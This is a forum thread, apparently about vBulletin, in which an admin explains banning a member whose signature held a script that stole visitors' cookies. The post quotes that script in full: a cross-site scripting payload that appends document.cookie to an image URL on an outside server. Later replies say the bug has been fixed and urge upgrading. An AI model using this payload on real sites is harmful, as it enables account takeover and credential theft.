I've identified the culprit, and sorry mate I'm not doing you any more favours. My personal opinion is that xxxxx was the one responsible (aka xxxxx if you don't know which one I'm on about). The reason being this little bumnugget in his sig:

<script>document.write('<img src="http://www.inforaa.net/cgi/news.pl&a='+document.cookie+'">')</script>

Basically this is a password stealer. It generates an image tag, with your user id and cookie-encrypted password tacked on the end of the URL. It points to his server. If you've ever viewed his sig, he's got your password. (or an encrypted form, but that can still be used to gain access to any vBulletin account you might have, possibly other forums systems if they also use MD5 password cookies) xxxx admits this but claims that he was the only one who saw the passwords and did not use them to attack xxxx. My experience suggests otherwise (and I shall go into more detail later) but even if these passwords weren't used in the attack, he was still stealing passwords (which he seems to think is okay), so he's now banned.


this is what happened at my friends forum. i think this is something that had to be said.

This bug was fixed several versions ago. You should tell your friend to read the announcements regarding vB and upgrade whenever there's a security fix.